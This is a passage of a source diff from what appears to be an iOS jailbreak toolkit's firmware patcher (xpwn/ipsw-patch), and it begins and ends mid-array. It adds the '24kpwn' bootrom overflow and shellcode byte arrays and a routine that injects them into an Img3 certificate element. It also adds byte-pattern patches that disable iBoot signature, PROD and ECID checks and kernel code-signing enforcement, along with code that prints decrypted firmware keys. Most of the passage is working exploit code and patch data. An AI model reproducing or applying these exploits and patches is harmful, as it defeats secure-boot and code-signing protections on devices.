0x12, + 0x00, 0x00, 0x01, 0x02, 0x03, 0x01, 0x0a, 0x06, 0x00, 0x02, 0x00, 0x00, + 0x00, 0x40, 0x01, 0x00, 0x1c, 0x40, 0x02, 0x22, 0x1c, 0x40, 0x02, 0x22, + 0x04, 0x09, 0x00, 0x00, 0x2c, 0x40, 0x02, 0x22, 0x6b, 0x73, 0x61, 0x74, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x62, 0x6f, 0x6f, 0x74, 0x73, 0x74, 0x72, 0x61, + 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x32, 0x6b, 0x73, 0x74, + 0xc0, 0x40, 0x02, 0x22, 0xc0, 0x40, 0x02, 0x22, 0xc8, 0x40, 0x02, 0x22, + 0xc8, 0x40, 0x02, 0x22, 0x84, 0x53, 0x02, 0x22, 0x00, 0x00, 0x00, 0x38, + 0x04, 0x00, 0x00, 0x38, 0x08, 0x00, 0x00, 0x38, 0x0c, 0x00, 0x00, 0x38, + 0x10, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, 0x38, 0x24, 0x00, 0x00, 0x38, + 0x28, 0x00, 0x00, 0x38, 0x2c, 0x00, 0x00, 0x38, 0x30, 0x00, 0x00, 0x38, + 0x24, 0xfe, 0x02, 0x22 +}; + +static const uint8_t x24kpwn_payload_data[] = { + 0x0d, 0x48, 0x0c, 0x49, 0x08, 0x60, 0x0a, 0x48, 0x08, 0x49, 0x08, 0x60, + 0x06, 0x48, 0x85, 0x46, 0x0e, 0xb0, 0x00, 0x20, 0x1c, 0xbc, 0x90, 0x46, + 0x9a, 0x46, 0xa3, 0x46, 0xf0, 0xbc, 0x02, 0xbc, 0x00, 0x20, 0x00, 0x25, + 0x05, 0x49, 0x08, 0x47, 0xd4, 0xfe, 0x02, 0x22, 0x20, 0x00, 0x00, 0x22, + 0xAA, 0xBB, 0xCC, 0xDD, 0xfc, 0x40, 0x02, 0x22, 0x40, 0x00, 0x00, 0x38, + 0xcf, 0x22, 0x00, 0x00 +}; + +static const uint8_t n8824kpwn_overflow_data[] = { + 0x00, 0x00, 0x00, 0x00, 0x12, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x40, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x0a, 0x06, + 0x00, 0x02, 0x00, 0x00, 0x00, 0x40, 0x01, 0x00, 0x20, 0x40, 0x02, 0x84, + 0x20, 0x40, 0x02, 0x84, 0x04, 0x09, 0x00, 0x00, 0x30, 0x40, 0x02, 0x84, + 0x6b, 0x73, 0x61, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x6f, 0x6f, 0x74, + 0x73, 0x74, 0x72, 0x61, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x32, 0x6b, 0x73, 0x74, 0xc4, 0x40, 0x02, 0x84, 0xc4, 0x40, 0x02, 0x84, + 0xcc, 0x40, 0x02, 0x84, 0xcc, 0x40, 0x02, 0x84, 0x01, 0x00, 0x00, 0x00, + 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, + 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x01, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x01, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x01, 0x07, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x01, 0x07, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x01, 0x01, 0x07, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, + 0x00, 0x03, 0x00, 0x00, 0x00, 0x08, 0x10, 0x83, 0x00, 0x00, 0x10, 0x83, + 0x00, 0x00, 0x10, 0x80, 0x04, 0x00, 0x10, 0x80, 0x08, 0x00, 0x10, 0x80, + 0x0c, 0x00, 0x10, 0x80, 0x10, 0x00, 0x10, 0x80, 0x20, 0x00, 0x10, 0x80, + 0x24, 0x00, 0x10, 0x80, 0x28, 0x00, 0x10, 0x80, 0x2c, 0x00, 0x10, 0x80, + 0x30, 0x00, 0x10, 0x80, 0xf4, 0x3d, 0x03, 0x84 +}; + +static const uint8_t n8824kpwn_payload_data[] = { + 0x09, 0x48, 0x0a, 0x49, 0x01, 0x60, 0x0a, 0x48, 0x0a, 0x49, 0x01, 0x60, + 0x0b, 0x48, 0x85, 0x46, 0x1c, 0xbc, 0x90, 0x46, 0x9a, 0x46, 0xa3, 0x46, + 0xf0, 0xbc, 0x01, 0xbc, 0x06, 0x48, 0x00, 0x21, 0x01, 0x60, 0x07, 0x48, + 0x00, 0x47, 0x00, 0x00, 0xcc, 0x41, 0x02, 0x84, 0x40, 0x00, 0x10, 0x80, + 0x40, 0x00, 0x00, 0x84, 0xAA, 0xBB, 0xCC, 0xDD, 0x30, 0x3f, 0x03, 0x84, + 0xfc, 0x3e, 0x03, 0x84, 0x73, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 +}; + + #ifdef HAVE_HW_CRYPTO #include <stdint.h> @@ -73,9 +162,9 @@ IOReturn doAES(io_connect_t conn, void* inbuf, void *outbuf, uint32_t size, IOAE #endif -void writeImg3Element(AbstractFile* file, Img3Element* element); +void writeImg3Element(AbstractFile* file, Img3Element* element, Img3Info* info); -void writeImg3Root(AbstractFile* file, Img3Element* element); +void writeImg3Root(AbstractFile* file, Img3Element* element, Img3Info* info); void flipAppleImg3Header(AppleImg3Header* header) { FLIPENDIANLE(header->magic); @@ -88,6 +177,11 @@ void flipAppleImg3RootExtra(AppleImg3RootExtra* extra) { FLIPENDIANLE(extra->name); } +flipAppleImg3KBAGHeader(AppleImg3KBAGHeader* data) { + FLIPENDIANLE(data->key_modifier); + FLIPENDIANLE(data->key_bits); +} + size_t readImg3(AbstractFile* file, void* data, size_t len) { Img3Info* info = (Img3Info*) file->data; memcpy(data, (void*)((uint8_t*)info->data->data + (uint32_t)info->offset), len); @@ -141,10 +235,24 @@ void closeImg3(AbstractFile* file) { AES_cbc_encrypt(info->data->data, info->data->data, (info->data->header->dataSize / 16) * 16, &(info->encryptKey), ivec, AES_ENCRYPT); } + if(info->exploit24k) { + info->replaceDWord = *((uint32_t*) info->data->data); + FLIPENDIANLE(info->replaceDWord); + *((uint32_t*) info->data->data) = 0x22023001; + flipEndianLE(info->data->data, 4); + } + + if(info->exploitN8824k) { + info->replaceDWord = *((uint32_t*) info->data->data); + FLIPENDIANLE(info->replaceDWord); + *((uint32_t*) info->data->data) = 0x84023001; + flipEndianLE(info->data->data, 4); + } + info->file->seek(info->file, 0); info->root->header->dataSize = 0; /* hack to make certain writeImg3Element doesn't preallocate */ info->root->header->size = 0; - writeImg3Element(info->file, info->root); + writeImg3Element(info->file, info->root, info); } info->root->free(info->root); @@ -237,7 +345,7 @@ void readImg3Root(AbstractFile* file, Img3Element* element) { element->free = freeImg3Root; } -void writeImg3Root(AbstractFile* file, Img3Element* element) { +void writeImg3Root(AbstractFile* file, Img3Element* element, Img3Info* info) { AppleImg3RootHeader* header; Img3Element* current; off_t curPos; @@ -255,7 +363,11 @@ void writeImg3Root(AbstractFile* file, Img3Element* element) { header->extra.shshOffset = (uint32_t)(file->tell(file) - sizeof(AppleImg3RootHeader)); } - writeImg3Element(file, current); + if(current->header->magic != IMG3_KBAG_MAGIC || info->encrypted) + { + writeImg3Element(file, current, info); + } + current = current->next; } @@ -273,7 +385,7 @@ void writeImg3Root(AbstractFile* file, Img3Element* element) { file->seek(file, header->base.size); } -void writeImg3Default(AbstractFile* file, Img3Element* element) { +void writeImg3Default(AbstractFile* file, Img3Element* element, Img3Info* info) { const char zeros[0x10] = {0}; file->write(file, element->data, element->header->dataSize); if((element->header->size - sizeof(AppleImg3Header)) > element->header->dataSize) { @@ -281,16 +393,66 @@ void writeImg3Default(AbstractFile* file, Img3Element* element) { } } -void writeImg3Element(AbstractFile* file, Img3Element* element) { +void writeImg3KBAG(AbstractFile* file, Img3Element* element, Img3Info* info) { + flipAppleImg3KBAGHeader((AppleImg3KBAGHeader*) element->data); + writeImg3Default(file, element, info); + flipAppleImg3KBAGHeader((AppleImg3KBAGHeader*) element->data); +} + +void do24kpwn(Img3Info* info, Img3Element* element, off_t curPos, const uint8_t* overflow, size_t overflow_size, const uint8_t* payload, size_t payload_size) +{ + off_t sizeRequired = (0x24000 + overflow_size) - curPos; + off_t dataRequired = sizeRequired - sizeof(AppleImg3Header); + element->data = realloc(element->data, dataRequired); + memset(((uint8_t*)element->data) + element->header->dataSize, 0, dataRequired - element->header->dataSize); + uint32_t overflowOffset = 0x24000 - (curPos + sizeof(AppleImg3Header)); + uint32_t payloadOffset = 0x23000 - (curPos + sizeof(AppleImg3Header)); + + memcpy(((uint8_t*)element->data) + overflowOffset, overflow, overflow_size); + memcpy(((uint8_t*)element->data) + payloadOffset, payload, payload_size); + + uint32_t* i; + for(i = (uint32_t*)(((uint8_t*)element->data) + payloadOffset); + i < (uint32_t*)(((uint8_t*)element->data) + payloadOffset + payload_size); + i++) { + uint32_t candidate = *i; + FLIPENDIANLE(candidate); + if(candidate == 0xDDCCBBAA) { + candidate = info->replaceDWord; + FLIPENDIANLE(candidate); + *i = candidate; + break; + } + } + + element->header->size = sizeRequired; + element->header->dataSize = dataRequired; +} + +void writeImg3Element(AbstractFile* file, Img3Element* element, Img3Info* info) { off_t curPos; + if(info->exploit24k && element->header->magic == IMG3_TYPE_MAGIC) { + // Drop TYPE tag for exploited LLB, because it throws off our payload calculations + // Bootrom shouldn't care anyway, and kernel currently doesn't care + return; + } + curPos = file->tell(file); + if(element->header->magic == IMG3_CERT_MAGIC) { + if(info->exploit24k) { + do24kpwn(info, element, curPos, x24kpwn_overflow_data, sizeof(x24kpwn_overflow_data), x24kpwn_payload_data, sizeof(x24kpwn_payload_data)); + } else if(info->exploitN8824k) { + do24kpwn(info, element, curPos, n8824kpwn_overflow_data, sizeof(n8824kpwn_overflow_data), n8824kpwn_payload_data, sizeof(n8824kpwn_payload_data)); + } + } + flipAppleImg3Header(element->header); file->write(file, element->header, sizeof(AppleImg3Header)); flipAppleImg3Header(element->header); - element->write(file, element); + element->write(file, element, info); file->seek(file, curPos + element->header->size); } @@ -315,6 +477,14 @@ Img3Element* readImg3Element(AbstractFile* file) { readImg3Root(file, toReturn); break; + case IMG3_KBAG_MAGIC: + toReturn->data = (unsigned char*) malloc(header->dataSize); + toReturn->write = writeImg3KBAG; + toReturn->free = freeImg3Default; + file->read(file, toReturn->data, header->dataSize); + flipAppleImg3KBAGHeader((AppleImg3KBAGHeader*) toReturn->data); + break; + default: toReturn->data = (unsigned char*) malloc(header->dataSize); toReturn->write = writeImg3Default; @@ -345,6 +515,7 @@ AbstractFile* createAbstractFileFromImg3(AbstractFile* file) { info->data = NULL; info->cert = NULL; info->kbag = NULL; + info->type = NULL; info->encrypted = FALSE; current = (Img3Element*) info->root->data; @@ -355,6 +526,9 @@ AbstractFile* createAbstractFileFromImg3(AbstractFile* file) { if(current->header->magic == IMG3_CERT_MAGIC) { info->cert = current; } + if(current->header->magic == IMG3_TYPE_MAGIC) { + info->type = current; + } if(current->header->magic == IMG3_KBAG_MAGIC && ((AppleImg3KBAGHeader*)current->data)->key_modifier == 1) { info->kbag = current; } @@ -363,6 +537,8 @@ AbstractFile* createAbstractFileFromImg3(AbstractFile* file) { info->offset = 0; info->dirty = FALSE; + info->exploit24k = FALSE; + info->exploitN8824k = FALSE; info->encrypted = FALSE; toReturn = (AbstractFile*) malloc(sizeof(AbstractFile2)); @@ -385,31 +561,56 @@ AbstractFile* createAbstractFileFromImg3(AbstractFile* file) { keySeed = (uint8_t*) malloc(keySeedLen); memcpy(keySeed, (uint8_t*)((AppleImg3KBAGHeader*)info->kbag->data) + sizeof(AppleImg3KBAGHeader), keySeedLen); #ifdef HAVE_HW_CRYPTO + printf("Have hardware crypto\n"); CFMutableDictionaryRef dict = IOServiceMatching("IOAESAccelerator"); io_service_t dev = IOServiceGetMatchingService(kIOMasterPortDefault, dict); io_connect_t conn = 0; IOServiceOpen(dev, mach_task_self(), 0, &conn); - doAES(conn, keySeed, keySeed, keySeedLen, GID, NULL, NULL, kIOAESAcceleratorDecrypt); - IOServiceClose(conn); - IOObjectRelease(dev); - - unsigned int key[keySeedLen - 16]; - unsigned int iv[16]; int i; - for(i = 0; i < 16; i++) - iv[i] = keySeed[i]; + printf("KeySeed: "); + for(i = 0; i < keySeedLen; i++) + { + printf("%02x", keySeed[i]); + } + printf("\n"); - for(i = 0; i < (keySeedLen - 16); i++) - key[i] = keySeed[i + 16]; + if(doAES(conn, keySeed, keySeed, keySeedLen, GID, NULL, NULL, kIOAESAcceleratorDecrypt) == 0) { + unsigned int key[keySeedLen - 16]; + unsigned int iv[16]; + + printf("IV: "); + for(i = 0; i < 16; i++) + { + iv[i] = keySeed[i]; + printf("%02x", iv[i]); + } + printf("\n"); + + printf("Key: "); + for(i = 0; i < (keySeedLen - 16); i++) + { + key[i] = keySeed[i + 16]; + printf("%02x", key[i]); + } + printf("\n"); + + setKeyImg3(abstractFile2, key, iv); + } - setKeyImg3(abstractFile2, key, iv); + IOServiceClose(conn); + IOObjectRelease(dev); #else int i = 0; + char outputBuffer[256]; + char curBuffer[256]; + outputBuffer[0] = '\0'; for(i = 0; i < keySeedLen; i++) { - printf("%02x", keySeed[i]); + sprintf(curBuffer, "%02x", keySeed[i]); + strcat(outputBuffer, curBuffer); } - printf("\n"); + strcat(outputBuffer, "\n"); + XLOG(4, outputBuffer); #endif free(keySeed); } @@ -451,3 +652,14 @@ AbstractFile* duplicateImg3File(AbstractFile* file, AbstractFile* backing) { return toReturn; } +void exploit24kpwn(AbstractFile* file) { + Img3Info* info = (Img3Info*) file->data; + info->exploit24k = TRUE; + info->dirty = TRUE; +} + +void exploitN8824kpwn(AbstractFile* file) { + Img3Info* info = (Img3Info*) file->data; + info->exploitN8824k = TRUE; + info->dirty = TRUE; +} ipsw-patch/img3.c @@ -33,9 +33,11 @@ void libxpwn_loglevel(int logLevel) { } void Log(int level, const char* file, unsigned int line, const char* function, const char* format, ...) { +#ifdef HARD_LOG static FILE* logFile = NULL; if(logFile == NULL) logFile = fopen("log.txt", "w"); +#endif char mainBuffer[1024]; char buffer[1024]; @@ -58,8 +60,11 @@ void Log(int level, const char* file, unsigned int line, const char* function, c snprintf(mainBuffer, sizeof(mainBuffer), "%s:%s:%d: %s", file, function, line, buffer); } logCallback(mainBuffer); + +#ifdef HARD_LOG strcat(mainBuffer, "\n"); fwrite(mainBuffer, 1, strlen(mainBuffer), logFile); fflush(logFile); +#endif } ipsw-patch/libxpwn.c @@ -4,6 +4,7 @@ #include "abstractfile.h" #include <xpwn/lzssfile.h> #include <xpwn/lzss.h> +#include <xpwn/libxpwn.h> void flipCompHeader(CompHeader* header) { FLIPENDIAN(header->signature); @@ -108,13 +109,13 @@ AbstractFile* createAbstractFileFromComp(AbstractFile* file) { uint32_t real_uncompressed = decompress_lzss(info->buffer, compressed, info->header.length_compressed); if(real_uncompressed != info->header.length_uncompressed) { - printf("mismatch: %d %d %d %x %x\n", info->header.length_compressed, real_uncompressed, info->header.length_uncompressed, compressed[info->header.length_compressed - 2], compressed[info->header.length_compressed - 1]); + XLOG(5, "mismatch: %d %d %d %x %x\n", info->header.length_compressed, real_uncompressed, info->header.length_uncompressed, compressed[info->header.length_compressed - 2], compressed[info->header.length_compressed - 1]); free(compressed); free(info); return NULL; } - printf("match: %d %d %d %x %x\n", info->header.length_compressed, real_uncompressed, info->header.length_uncompressed, compressed[info->header.length_compressed - 2], compressed[info->header.length_compressed - 1]); + XLOG(5, "match: %d %d %d %x %x\n", info->header.length_compressed, real_uncompressed, info->header.length_uncompressed, compressed[info->header.length_compressed - 2], compressed[info->header.length_compressed - 1]); free(compressed); ipsw-patch/lzssfile.c @@ -343,14 +343,14 @@ int main(int argc, char* argv[]) { size_t defaultRootSize = ((IntegerValue*) getValueByKey(info, "RootFilesystemSize"))->value; minimumRootSize = defaultRootSize * 1000 * 1000; - minimumRootSize -= minimumRootSize % 4096; + minimumRootSize -= minimumRootSize % 512; if(preferredRootSize == 0) { preferredRootSize = defaultRootSize; } rootSize = preferredRootSize * 1000 * 1000; - rootSize -= rootSize % 4096; + rootSize -= rootSize % 512; if(useMemory) { buffer = malloc(rootSize); @@ -369,10 +369,10 @@ int main(int argc, char* argv[]) { rootFS = IOFuncFromAbstractFile(openRoot((void**)&buffer, &rootSize)); rootVolume = openVolume(rootFS); - XLOG(0, "Growing root to minimum: %lu\n", (unsigned long int) minimumRootSize); fflush(stdout); + XLOG(0, "Growing root to minimum: %ld\n", (long) defaultRootSize); fflush(stdout); grow_hfs(rootVolume, minimumRootSize); if(rootSize > minimumRootSize) { - XLOG(0, "Growing root: %lu\n", (unsigned long int) rootSize); fflush(stdout); + XLOG(0, "Growing root: %ld\n", (long) preferredRootSize); fflush(stdout); grow_hfs(rootVolume, rootSize); } @@ -476,7 +476,7 @@ int main(int argc, char* argv[]) { closeVolume(rootVolume); CLOSE(rootFS); - buildDmg(openRoot((void**)&buffer, &rootSize), getFileFromOutputStateForReplace(&outputState, rootFSPathInIPSW)); + buildDmg(openRoot((void**)&buffer, &rootSize), getFileFromOutputStateForReplace(&outputState, rootFSPathInIPSW), 2048); closeRoot(buffer); ipsw-patch/main.c @@ -67,7 +67,7 @@ AbstractFile* duplicateAbstractFile(AbstractFile* file, AbstractFile* backing) { } } -AbstractFile* openAbstractFile2(AbstractFile* file, const unsigned int* key, const unsigned int* iv) { +AbstractFile* openAbstractFile3(AbstractFile* file, const unsigned int* key, const unsigned int* iv, int layers) { uint32_t signatureBE; uint32_t signatureLE; @@ -81,21 +81,38 @@ AbstractFile* openAbstractFile2(AbstractFile* file, const unsigned int* key, con FLIPENDIANLE(signatureLE); file->seek(file, 0); + AbstractFile* cur; if(signatureBE == SIGNATURE_8900) { - return openAbstractFile2(createAbstractFileFrom8900(file), key, iv); + cur = createAbstractFileFrom8900(file); } else if(signatureLE == IMG2_SIGNATURE) { - return openAbstractFile2(createAbstractFileFromImg2(file), key, iv); + cur = createAbstractFileFromImg2(file); } else if(signatureLE == IMG3_SIGNATURE) { AbstractFile2* img3 = (AbstractFile2*) createAbstractFileFromImg3(file); - img3->setKey(img3, key, iv); - return openAbstractFile((AbstractFile*) img3); + if(key && iv) + img3->setKey(img3, key, iv); + cur = (AbstractFile*) img3; + key = NULL; + iv = NULL; } else if(signatureBE == COMP_SIGNATURE) { - return openAbstractFile(createAbstractFileFromComp(file)); + cur = createAbstractFileFromComp(file); + key = NULL; + iv = NULL; } else if(signatureBE == IBOOTIM_SIG_UINT) { - return openAbstractFile(createAbstractFileFromIBootIM(file)); + cur = createAbstractFileFromIBootIM(file); + key = NULL; + iv = NULL; } else { return file; } + + if(layers < 0 || layers > 0) + return openAbstractFile3(cur, key, iv, layers - 1); + else + return cur; +} + +AbstractFile* openAbstractFile2(AbstractFile* file, const unsigned int* key, const unsigned int* iv) { + return openAbstractFile3(file, key, iv, -1); } AbstractFile* duplicateAbstractFile2(AbstractFile* file, AbstractFile* backing, const unsigned int* key, const unsigned int* iv, AbstractFile* certificate) { ipsw-patch/nor_files.c @@ -59,6 +59,7 @@ Dictionary* parseIPSW2(const char* inputIPSW, const char* bundleRoot, char** bun dir = opendir(bundleRoot); if(dir == NULL) { + XLOG(1, "Bundles directory not found\n"); return NULL; } @@ -249,6 +250,52 @@ void doPatchInPlace(Volume* volume, const char* filePath, const char* patchPath) XLOG(0, "success\n"); fflush(stdout); } +void doPatchInPlaceMemoryPatch(Volume* volume, const char* filePath, void** patchData, size_t* patchSize) { + void* buffer; + void* buffer2; + size_t bufferSize; + size_t bufferSize2; + AbstractFile* bufferFile; + AbstractFile* patchFile; + AbstractFile* out; + + buffer = malloc(1); + bufferSize = 0; + bufferFile = createAbstractFileFromMemoryFile((void**)&buffer, &bufferSize); + + XLOG(0, "retrieving..."); fflush(stdout); + get_hfs(volume, filePath, bufferFile); + bufferFile->close(bufferFile); + + XLOG(0, "patching..."); fflush(stdout); + + patchFile = createAbstractFileFromMemoryFile(patchData, patchSize); + + buffer2 = malloc(1); + bufferSize2 = 0; + out = duplicateAbstractFile(createAbstractFileFromMemoryFile((void**)&buffer, &bufferSize), createAbstractFileFromMemoryFile((void**)&buffer2, &bufferSize2)); + + // reopen the inner package + bufferFile = openAbstractFile(createAbstractFileFromMemoryFile((void**)&buffer, &bufferSize)); + + if(!patchFile || !bufferFile || !out) { + XLOG(0, "file error\n"); + exit(0); + } + + if(patch(bufferFile, out, patchFile) != 0) { + XLOG(0, "patch failed\n"); + exit(0); + } + + XLOG(0, "writing... "); fflush(stdout); + add_hfs(volume, createAbstractFileFromMemoryFile((void**)&buffer2, &bufferSize2), filePath); + free(buffer2); + free(buffer); + + XLOG(0, "success\n"); fflush(stdout); +} + void createRestoreOptions(Volume* volume, int SystemPartitionSize, int UpdateBaseband) { const char optionsPlist[] = "/usr/local/share/restore/options.plist"; AbstractFile* plistFile; @@ -325,11 +372,21 @@ void fixupBootNeuterArgs(Volume* volume, char unlockBaseband, char selfDestruct, int patchSigCheck(AbstractFile* file) { const uint8_t patch[] = {0x01, 0xE0, 0x01, 0x20, 0x40, 0x42, 0x88, 0x23}; + + // for 3gs, signature check + const uint8_t patch2[] = {0x08, 0xB1, 0x4F, 0xF0, 0xFF, 0x30, 0xA7, 0xF1, 0x10, 0x0D}; + // for 3gs, prod check + const uint8_t patch3[] = {0x03, 0x94, 0xFF, 0xF7, 0x11, 0xFF, 0x04, 0x46}; + + // for 3gs, ecid check + const uint8_t patch4[] = {0x50, 0x46, 0xFF, 0xF7, 0xB1, 0xFE, 0x04, 0x46}; + size_t length = file->getLength(file); - uint8_t* buffer = (uint8_t*)malloc(length); + uint8_t* buffer = (uint8_t*)malloc(length + sizeof(patch2)); file->seek(file, 0); file->read(file, buffer, length); + memset(buffer + length, 0, sizeof(patch2)); int retval = FALSE; int i; @@ -341,6 +398,40 @@ int patchSigCheck(AbstractFile* file) { file->seek(file, i); file->write(file, candidate, sizeof(patch)); retval = TRUE; + XLOG(3, "iBoot armv6 signature check patch success\n"); fflush(stdout); + continue; + } + if(memcmp(candidate, patch2, sizeof(patch2)) == 0) { + candidate[2] = 0x0; + candidate[3] = 0x20; + candidate[4] = 0x0; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(patch2)); + retval = TRUE; + XLOG(3, "iBoot armv7 signature check patch success\n"); fflush(stdout); + continue; + } + if(memcmp(candidate, patch3, sizeof(patch3)) == 0) { + candidate[2] = 0x0; + candidate[3] = 0x20; + candidate[4] = 0x0; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(patch3)); + retval = TRUE; + XLOG(3, "iBoot armv7 PROD check patch success\n"); fflush(stdout); + continue; + } + if(memcmp(candidate, patch4, sizeof(patch4)) == 0) { + candidate[2] = 0x0; + candidate[3] = 0x20; + candidate[4] = 0x0; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(patch4)); + retval = TRUE; + XLOG(3, "iBoot armv7 ECID check patch success\n"); fflush(stdout); continue; } } @@ -349,37 +440,84 @@ int patchSigCheck(AbstractFile* file) { return retval; } +int Do30Patches = TRUE; + int patchKernel(AbstractFile* file) { + // codesign const char patch[] = {0x00, 0x00, 0x00, 0x0A, 0x00, 0x40, 0xA0, 0xE3, 0x04, 0x00, 0xA0, 0xE1, 0x90, 0x80, 0xBD, 0xE8}; - const char patch2[] = {0xFF, 0x50, 0xA0, 0xE3, 0x04, 0x00, 0xA0, 0xE1, 0x0A, 0x10, 0xA0, 0xE1}; + const char patch_old[] = {0xFF, 0x50, 0xA0, 0xE3, 0x04, 0x00, 0xA0, 0xE1, 0x0A, 0x10, 0xA0, 0xE1}; + // 2.0 vm_map max_prot const char patch3[] = {0x99, 0x91, 0x43, 0x2B, 0x91, 0xCD, 0xE7, 0x04, 0x24, 0x1D, 0xB0}; + // 3.0 vm_map max_prot + const char patch2[] = {0x2E, 0xD1, 0x35, 0x98, 0x80, 0x07, 0x33, 0xD4, 0x6B, 0x08, 0x1E, 0x1C}; + + // 3.0 illb img3 patch 1 + const char patch4[] = {0x98, 0x47, 0x00, 0x28, 0x00, 0xD0, 0xAE, 0xE0, 0x06, 0x98}; + + // 3.0 illb img3 patch 2 + const char patch5[] = {0x05, 0x1E, 0x00, 0xD0, 0xA8, 0xE0, 0x03, 0x9B}; + + // 3.0 CS enforcement patch + const char patch6[] = {0x9C, 0x22, 0x03, 0x59, 0x99, 0x58}; + + // 3.0 armv7 vm_map_enter max_prot + const char n88patch1[] = {0x93, 0xBB, 0x16, 0xF0, 0x02, 0x0F, 0x40, 0xF0, 0x36, 0x80, 0x63, 0x08}; + + // 3.0 armv7 cs patch + const char n88patch2[] = {0x05, 0x4B, 0x98, 0x47, 0x00, 0xB1, 0x00, 0x24, 0x20, 0x46, 0x90, 0xBD}; + + // 3.0 armv7 cs_enforcement_disable patch + const char n88patch3[] = {0xD3, 0xF8, 0x9C, 0x20, 0xDF, 0xF8}; + + // 3.0 arm7 img3 prod patch + const char n88patch4[] = {0x03, 0x94, 0xFF, 0xF7, 0x29, 0xFF, 0xF8, 0xB1}; + + // 3.0 arm7 img3 ecid patch + const char n88patch5[] = {0x0C, 0xCA, 0xFF, 0xF7, 0x10, 0xFF, 0x00, 0x38}; + + // 3.0 arm7 img3 signature patch + const char n88patch6[] = {0x30, 0xE0, 0x4F, 0xF0, 0xFF, 0x30, 0x2D, 0xE0}; + + // 3.0 arm7 img3 signature patch + const char n88patch_test1[] = {0x67, 0x4B, 0x98, 0x47, 0x00, 0x28}; + + // 3.0 arm7 img3 signature patch + const char n88patch_test2[] = {0x04, 0x98, 0xFF, 0xF7, 0xD9, 0xFD, 